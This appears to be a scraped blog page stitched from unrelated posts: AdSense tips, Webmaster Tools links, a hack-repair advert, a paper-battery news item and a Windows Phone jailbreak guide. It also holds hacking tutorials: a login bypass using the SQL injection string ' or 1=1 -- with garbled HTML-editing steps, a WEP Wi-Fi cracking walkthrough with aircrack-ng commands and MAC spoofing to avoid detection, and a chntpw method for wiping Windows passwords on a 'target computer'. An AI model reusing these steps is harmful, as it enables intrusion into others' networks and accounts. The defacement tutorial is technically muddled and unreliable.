21 Tips To Get Adsense Approval For Your Blog

Many of us do apply adsense for monetizing our blogs/websites, and among those 90% gets rejected by the adsense crew, Some may even take a wild path by creating another email account and tries again, but alas, the result would be same, rejected.!! and Thats the moment at which they thinks to seize their blogging. 
I really don't have a shortcut recipe for adsense approval, but i do have few tips, which most of you might be unaware or unnoticed. Following these simple steps could help your blog's adsense approval. 
First of all,don't feel dejected after your adsense got rejected,because you are not within the terms of adsense. Don't be late to check out your email to know what went wrong in your blog/website. Google adsense team is so kind that, they informs you the reason behind rejection. 
  
  1. Use Professional or Minimal design for your blog, because it makes things easy for your reader and Google. Don't fill your blog with fancy stuffs like background sound,fancy mouse pointers,glittering texts etc
    , because it makes your blog laggy,  increase page load time which annoys user. 
    Make the Google adsense team and your user impressed with your design and work. 
  2. Navigations are veins of a website, it is the most essential part. Make sure that it is clean and user friendly. 
  3. A messy Sidebar could mess with your adsense approval, Thus don't fill your Sidebar with live,fancy widgets.Just use a 'popular posts' , 'categories' and a subscription box.It is more than enough in a sidebar. 
  4. The word copycat should not be in a bloggers dictionary, copying content from any other websites is strictly a violation of adsense terms. Google Adsense demands fresh,genuine,relevant,unique and quality contents from bloggers. 
  5. Don't think about monetizing your work before perfect time arrives. wait until you get some returning users, wait until your site rank gets increased and then monetize. 
  6. Avoid copyrighted images,videos,and scripts.Don't copy down images from Google search,Bing and other search engines as it is a serious violation of adsense terms. 
  7. Don't make your blog post short,and not so lengthy. Around 400-500 characters are good and standard. Always keep in mind that you are writing for humans, not for computers. 
  8. Before applying for adsense,make sure that your blog have enough content (around 40-50 quality post) and traffic. Many applications are rejected by the reason of "In sufficient content". 
  9. It is recommended not to use any other ads networks at the time you applys for adsense . 
  10. Make sure that your blog/website contains adsense approved languages only. 
  11. Use a custom domain for your blog,just to assure the adsense team that you are a serious blogger. 
  12. None of us love to read a website which contains mature content with family, so does adsense, except that it never likes a mature website. So it is recommended to make your content family-safe. Avoid content like 'buttocks,close-ups of breast,provocative poses,see-through clothing and strategically covered nudity and other mature content. Also see prohibited content . 
  13. Avoid too much images in a single post. I've seen so many with too much images in a single post , especially in fashion blogs. If you want to show your works or something using a set of images you could always approach flickr or picasa for creating slideshot of desired pics. Remember,Google bot crawl only those content with text not images. 
  14. Make following your work easy for your users by creating an RSS Feed for your website/blog, which acts like an automated sitemap for your site. 
  15. Feedbacks are well and good, Integrate your blog with your personal Google+ account. which in-turn increase your back-links and gives you a little support for adsense approval. 
  16. Don't forget to submit your sitemap so that Google could keep track of your site's activities, which results in your site's ranking incrementation. in order to submit your sitemap to Google  you should use Google webmasters tools. You could also use Google analytics for SEO purpose. 
  17. Update Your Blog at least twice in a week. 
  18. It is recommended that you should use an responsive design for your site, or at least have a mobile version as they are in a pursuit of becoming the primary internet device. 
  19. Never send request for Google adsense until your blog customization finishes (Under construction) or in beta condition. 
  20. Never forget to read TOS and policies of Google adsense . 
  21. And finally, your users are your cash, don't disappoint them. 
Also visit Google Adsense Help Center. If your blog is ready and comply all Google policy,Just apply for Adsense 

Learn Google Webmaster Tools


Google webmaster tools are vital tool for bloggers who can index their status of blog in Google search results,update site maps,view statistics of GoogleBot, get list of broken links,errors  etc. Google webmaster tool can be used to customize your blogs search results in Google. For running a successful blog,you should know about all the tools available in Google webmaster.

Google itself providing many useful articles,videos and forums for webmasters and bloggers. Google needs quality website with quality SEO(Stay away from blackhats). For doing this job nicely, you have to be mastered with their tools.
Let me provide you some resources where you can learn more about Google Webmaster Tools.



  • Google Webmaster Tool YouTube Channel.
  1. WebmasterTool Help
  2.  Webmaster Academy 
I recommend you to subscribe this channel,because the head of Google web team, Matt will upload trendy videos which we wish to get answered.You will be updated about trends in Google search changes.
I strongly recommend this help resources.You must go through all the sub-links to get know about all the features and tools available in Google webmaster tool. This is the real source i personally used to know about how to use a tool.
If Google update their algorithms or any updates about Google searches will be posted firstly on this blog. So keep updated with every changes in Google world.

Google Official webmaster forum can be used to ask any doubts,errors and anything related to SEO and Google search results etc. Always remember that,search for your query and ensure that such questions are not repeated.
Third party, reputed website in web world which seriously post articles on SEO.
I didn't attended this course,but if you are still not able to use Google webmaster tool easily,you can attend this course. Remember it is paid course,So i don't recommend this one.


This is an official PDF file on "Google SEO Starter Guide" by Google.You must go through this article before your next blog post :) . It talks about real SEO but not related about learning about TOOLS in webmaster. But i felt this PDF will be very helpful for your SEO of blog.

Has your website or WordPress blog been hacked?

Is your site displaying the “This site may be hacked ” warning at Google.com or Bing.com?
Web site hacked or web site blocked by Google?
With over 15 years experience, and a long list of “verifiable” satisfied customer service testimonials, The Hack Repair Guy™ will remove malware, work to fix website security issues, recommend free techniques to monitor and prevent future attacks, install WordPress security plugins, and even repair basic WordPress errors; all for a reasonable flat rate, no matter how long it takes to resolve. Heroic Customer Service— it’s what we do! 

We clean most infected sites of malware within two hours and unblacklist websites within 24 hours. Why choose HackRepair.com?

  • Service
    We’ll discuss your situation by phone to determine how quickly we can repair your website.
  • Expedience
    We’ll clear your website of malicious scripts and malware then get your web site back up and running quickly. We are WordPress CMS experts as well.
  • Comprehensive
    We’ll help recover and unblock your site within Google and help you in clearing any Google.com or Bing.com website listing issues.
  • Education
    Our goal is to help prevent your website from being hacked again. We install security and security monitoring plugins, and will train you on how to use them free of charge as well.
  • And don’t forget our money back guarantee!


How can we guarantee we will clear & recover your hacked website?

video testimonial for hackrepair.com
  • We’ve been securing websites since 1997.
  • We have developed a range of tools to help quickly identify and clear malicious scripts or hacker code from your website pages.
  • Our friendly, knowledgeable staff is ready and available to assist you on your schedule.
  • We do not outsource our work; everything is done in-house here, in the USA.
  • We will work directly with Google on your behalf to ensure your website is unblocked within Google.com or Bing.com as quickly as possible.

Don’t let your reputation be ruined as a reported attack page. Call
(619) 479-6637 or toll-free (800) 639-6442, and let us help to repair your reputation immediately!



Other Common hack related terms and information relating to how to clear hacked websites:
  • iframe hack – sometimes called an iframe injection is often used by hackers to redirect visitors to other websites or force a software download upon visiting the hacked website.
  • Base64 code – is a common means hackers code their web page hacks. This obfuscated code makes it harder to find hacker code on a web page. A server admin searching a server for hack related text may often miss files injected with obfuscated base64 PHP code because the obfuscated code conceals the usual suspect phrases. The “pharma hack” often uses base64 or obfuscated coding.
  • Botnet – is a large collection of hacked PCs, sometimes called zombie computers. These PCs once controlled may be used to send junk e-mail or bring down web services. Botnet’s are often the means by which denial of service attacks are initiated.
  • ‘hacked by hacker’ – was a well known server wide compromise which took advantage of a vulnerability relating to the symbolic links setting within cPanel configured web servers. A number of web hosts fell prey to this cPanel related exploit, which allowed hackers to replace most of the “index” type pages of accounts configured on server with a text file containing the words, ‘hacked by hacker’.
  • Zero-Day exploit – Affecting both websites and computers, the zero-Day exploit is a term describing not yet documented security threats or vulnerabilities.
  • Denial of service attack – or distributed denial of service attack (DDoS), is a distributed attack on a network or service. Because these types of attacks originate from so many locations simultaneously they often result in hours of downtime until mitigated.
  •  
  • Common search engine and web browser alert messages include:
    Google – ‘This site may be hacked.’
    Google – ‘This site may harm your computer.’
    Google – ‘This site may harm your device’
    Google – ‘This site may be compromised’
    Bing and Twitter – ‘unsafe link’
    Chrome – ‘Warning: Something’s Not Right Here!’
    Chrome – ‘Danger: Malware Ahead!’
    Firefox – ‘Reported Attack Site!’
    Internet Explorer – ‘This website has been reported as unsafe’
    Opera – ‘Fraud Warning’
    Safari – ‘Warning: Visiting this site may harm your computer’
    Yahoo – ‘Warning: Hacking Risks’

Technology Updates!

Imagine wrapping paper that could be a gift in and of itself because it lights up with words like "Happy Birthday." That is one potential application of a new biodegradable battery made of cellulose, the stuff of paper.

Scientists worldwide are striving to develop thin, flexible, lightweight, inexpensive, environmentally friendly batteries made entirely from nonmetal parts. Among the most promising materials for these batteries are conducting polymers.

However, until now these have impractical for use in batteries — for instance, their ability to hold a charge often degrades over use.

Easy to make

The key to this new battery turned out to be an often bothersome green algae known as Cladophora. Rotting heaps of this hairlike freshwater plant throughout the world can lead to unsightly, foul-smelling beaches.

This algae makes an unusual kind of cellulose typified by a very large surface area, 100 times that of the cellulose found in paper. This allowed researchers to dramatically increase the amount of conducting polymer available for use in the new device, enabling it to better recharge, hold and discharge electricity.

"We have long hoped to find some sort of constructive use for the material from algae blooms and have now been shown this to be possible," said researcher Maria Strømme, a nanotechnologist at Uppsala University in Sweden. "This creates new possibilities for large-scale production of environmentally friendly, cost-effective, lightweight energy storage systems."

The new batteries consisted of extremely thin layers of conducting polymer just 40 to 50 nanometers or billionths of a meter wide coating algae cellulose fibers only 20 to 30 nanometers wide that were collected into paper sheets.

"They're very easy to make," Strømme said.

Quick to charge

They could hold 50 to 200 percent more charge than similar conducting polymer batteries, and once better optimized, they might even be competitive with commercial lithium batteries, the researchers noted. They also recharged much faster than conventional rechargeable batteries — while a regular battery takes at least an hour to recharge, the new batteries could recharge in anywhere from eight minutes to just 11 seconds.

The new battery also showed a dramatic boost in the ability to hold a charge over use. While a comparable polymer battery showed a 50 percent drop in the amount of charge it could hold after 60 cycles of discharging and recharging, the new battery showed just a 6 percent loss through 100 charging cycles.

"When you have thick polymer layers, it's hard to get all the material to recharge properly, and it turns into an insulator, so you lose capacity," said researcher Gustav Nyström, an electrochemist at Uppsala University. "When you have thin layers, you can get it fully discharged and recharged."

Flexible electronics

The researchers suggest their batteries appear well-suited for applications involving flexible electronics, such as clothing and packaging.

"We're not focused on replacing lithium ion batteries — we want to find new applications where batteries are not used today," Strømme told LiveScience. "What if you could put batteries inside wallpaper to charge sensors in your home? If you could put this into clothes, can you couple that with detectors to analyze sweat from your body to tell if there's anything wrong?"

Future directions of research include seeing how much charge these batteries lose over time, a problem with polymer batteries and all batteries in general. They also want to see how much they can scale up these batteries, "see if we can make them much, much larger," Strømme said.

The scientists detailed their last month in the journal Nano Letters.

How To Deface A Website With Basic HTML Coding In Just 5 Minute

I was browsing the net when i saw this tutorial:

Source: http://naijadudes.com


Steps:

Open the site you want to hack. Provide wrong username/password combination in its log in form. (e.g. : Username : me and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be prepared your experiment starts from here.


Right click anywhere on that error page =>> go to view source.

3. There you can see the HTML coding with JavaScript.• There you find somewhat like this....<_form action="...Login....">• Before this login information copy the URL of the site in which you are. (e.g. :"< _form..........action=http://www.targetwebsite.com/login.......>")

4. Then delete the JavaScript from the above that validates your information in the server.(Do this very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information)

5.Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> “there instead of "<_type=password>". See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write )

6. Just go to file => save as and save it anywhere in your hard disk with ext.html(e.g.: c:\chan.html)

7. Reopen your target web page by double clicking 'chan.html' file that you saved in your hard disk earlier.• You see that some changes in current page as compared to original One. Don't worry.

8. Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have successfully cracked the above website and entered into the account of List user saved in the server's database.

Warnings

Do the coding and changes very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information.

Please like this post if it worked for you

Hacking Wifi key using Backtrack

Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections. Wifi has become an integral part of our lives today.

Right from Mobile Phones to Laptops to Ipads every device now has Wifi support.
Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves, however, it has been found that WEP is not as secure as once believed. Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack. Read on to learn how ..

Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.

SETTING UP THE CARD AND THE CONSOLE
Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -
* ifconfig
This is the Linux equivalent of ipconfig, you will see the network adapters in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.
* airmon-ng
This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range
* airmon-ng stop [Wi-Fi Card name(without the quotes)]
This command will stop the cards broadcast and reception immediately
* macchanger –mac [Desired MAC address] [Wi-Fi card name]
This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later
* airmon-ng start [Wi-Fi Card name]
You will see another extra adapter that is set on monitor mode, use that adapter for all further purposes in the following commands where – ‘[Wi-Fi card name]’ appears
DUMPING PACKETS
Once you have set up all the parameters,you need to sniff and dump data packets in order to get the key.You can do so by using following commands. On the command console type these commands -
* airodump-ng [Wi-Fi card name]
Copy and paste the BSSID in the following command and execute it
* airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.
SPEEDING UP THINGS
However packet dumping is quite a slow process,we need to speed up things to save our time.Open a new console after the first data packet has been stored and type the command in the new console and execute it
*airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.
REVEALING WEP KEY
Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.
aircrack-ng –n 64 –b [BSSID] [Filename without the extension] Revealing the WEP Key -
As you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX
It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:
aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]
Remember, the bit level should be a number of 2n where n:1,2,3,4…
e.g.
aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.
Now just login using the WEP key you got.

Reset Admin Password of Windows XP, Vista and 7

This trick enables us to change the password of Windows Operating System Using Ubuntu 9.10 distribution installed on a usb drive.   Eventhough the titile states on XP, Vista and 7, the trick you are gonna read is also for 2000 and 2003. This method is applicable when you have some Alzheimer’s disease and you forgot your most important Windows login password.  And probably you do some idiotic things with all the password possibilities you know and then your account gets locked up. So there when you stand without knowing what to do, this trick comes to the rescue.
What do you need :

1) Unetbootin
2) Ubuntu 9.10 ISO (You can also download it using Unetbootin)
3)  chntpw
4) A Usb drive (1 gb or more)
Steps :
First we need to install Ubuntu 9.10 to the USB drive..  Open Unetbootin in a computer other than the target computer (you couldn’t do it on the target computer as it is already locked or forgotten password)
Select Ubuntu 9.10 or Select the “Disc image” option and select the path where you have downloaded the ISO. Select the type as USB drive and select the drive where the usb drive is displayed. Click Ok..
Then Wait..
It installs…
When it is done, click on “exit” and remove the USB drive. Yupeee!! You now have the live image of Ubuntu 9.10
Insert the Usb drive into the target computer. Start the computer, Boot from the usb drive. If it does not come, you may have to change the boot device preferences in the BIOS.
When you boot from the USB drive , the unetbootin options comes and you have to select “default” . Thus it boots into Ubuntu OS. Now you have access to the windows filesystem. Hurray!!
Now we need the tool chntpw. To get this software, connect to the internet and run the command :
sudo software-properties-gtk --enable-component=universe--enable-component=multiverse; sudo apt-get update; sudo apt-get install chntpw
Go to the terminal and change the directory to the password file
cd /media/path/to/disk/WINDOWS/system32/config/
Now run the chntpw tool
# sudo chntpw -u username SAM SYSTEM
When it is executed, it will just erase the password. Now you could restart and log into the windows without the password.
Anyway, as a security precaution , you may backup the data  in the hard disk, what if you mess it all up?? lolz..

Developing native Apps for Jailbreaked Windows Phone

Windows Phone loaded with Windows OS like Windows Phone 7, Windows Phone 7.5, Windows Phone 7.8, Windows Phone 8 and lately if news sources are to be believed then even Windows Phone 8.1 is also on cards.

One thing for which Microsoft should be appreciated is the security & stability of the OS of Mobile Phone, When compared with Android it is much much secure OS and is on par with Apple iOS in terms of Security.
But adding security had imposed lot of restrictions and thus you wont find much applications as compared to Android & iPhone on Windows Store.

You will never find applications like Task Manger where you have flexibility to see which applications are running on phone, what amount of memory are they using which you can easily do it in even the cheapest of android phones. So here is the idea by which developers can develop applications which would have not been possible with Microsoft's restriction.

So as to develop a native application thus utilizing the core features which are currently available to OEMs, you need to jailbreak your windows phone.

Now what is Jail-breaking? Just visit here to find out what exactly Jailbreaking is and how to Jailbreak your Windows Phone. Once you have your phone jailbreaked, follow the below procedure to develop native application and enrich you applications with native functionality.

      1.    Download the DLL Import Project from the below link
     http://forum.xda-developers.com/showthread.php?t=1006331

    2.    The DLL Import Project contains compiled DLLs, with which you can access to those API which are not provided or accessible in non-jailbreak windows Phone 7

The following steps were followed while creating a new application taking reference of DLL Import project for CPU and Memory Analysis Tool:


       - Follow the normal procedure of creating a new Windows Phone 8/7.1 project on Visual Studio 2012.

       - When the project has been made, go to the Solution Explorer bar and right click on the project name.


       - Since the DLLs contains Native Code, Visual Studio will not allow you to add the DLL via Add references, so instead we have a workaround as follow


       -  Go to Add > Existing Item.


     - Doing this, navigate to the folder containing the respective DLLs you need to add for the project.


      - In that folder, select the respective DLLs and click open. The DLLs will be added.


     - For the Memory CPU Tool, the DLLs added were

                           DllImportMango.dll
                           Microsoft.Phone.InteropServices.dll
                           Microsoft.Live.dll
                           Microsoft.Phone.Controls.Toolkit.dll
                           Microsoft.Live.Controls.dll
                           AmCharts.Windows.QuickCharts.WP.dll.

     - After adding all the DLLs the main step is to set their properties.


    - Right click on each DLL name and go to Properties.


   - In properties the Build Action should be set to Content and Copy to Output Directory should be set to Copy Always.


    - This step should be done for all the DLLs.


    - Now go to the Solution Explorer and expand Properties.


    - Right click on WMAppManifest.xml and go to Properties.


   - Here also the Build Action should be set to Content and Copy to Output Directory should be set to Copy Always.


   - Now open the project in the file explorer and go to the folder named Properties.


   - In this folder edit the WMAppManifest.xml in the notepad. It should contain the following capabilities:

ID_CAP_GAMERSERVICES
ID_CAP_IDENTITY_DEVICE
ID_CAP_IDENTITY_USER
ID_CAP_LOCATION
ID_CAP_MEDIALIB
ID_CAP_MICROPHONE
ID_CAP_NETWORKING
ID_CAP_PHONEDIALER
ID_CAP_PUSH_NOTIFICATION
ID_CAP_SENSORS
ID_CAP_WEBBROWSERCOMPONENT
ID_CAP_NETWORKING_ADMIN
ID_CAP_INTEROPSERVICES
ID_CAP_RINGTONE_ADD
      - Now go to the solution explorer and right click on References and click on Add Reference.

      - Check mark the respective references required for the project.

      - In this project, the references used were:

Microsoft.Devices.Sensors
Microsoft.Phone
Microsoft.Phone.Interop
Microsoft.Xna.Framework
Microsoft.Xna.Framework.Game
mscorlib
mscorlib.Extensions
System
System.Core
System.Net
System.Windows
System.Xml
System.Xml.Linq


Above mentioned are all the points which should be kept in mind while creating a new application based on DLL Imports in Windows Phone 8/7.1
This is the procedure to use already available DLLs and access those APIS which DLL Import project has exposed.
In case you want to use/add/modify the APIs and create your new DLL. It is possible by following procedure.
1.      Install the following software
a.      Visual Studio 2008 SP1
b.      Windows Mobile SDK 6 PRO
2.      Now open the Solution which is there inside VS2008 folder of CSharp DLL Import Project which you have downloaded earlier.
3.      Once you open the solution you can easily modify/add the APIs which are available in Windows Mobile 6, compile the solution and get the respective DLL.
4.      Now you can use the newly made DLL by Add Existing Item and following the above procedure in you windows phone 7 projects which will run properly on Jailbreak Windows Phone 7.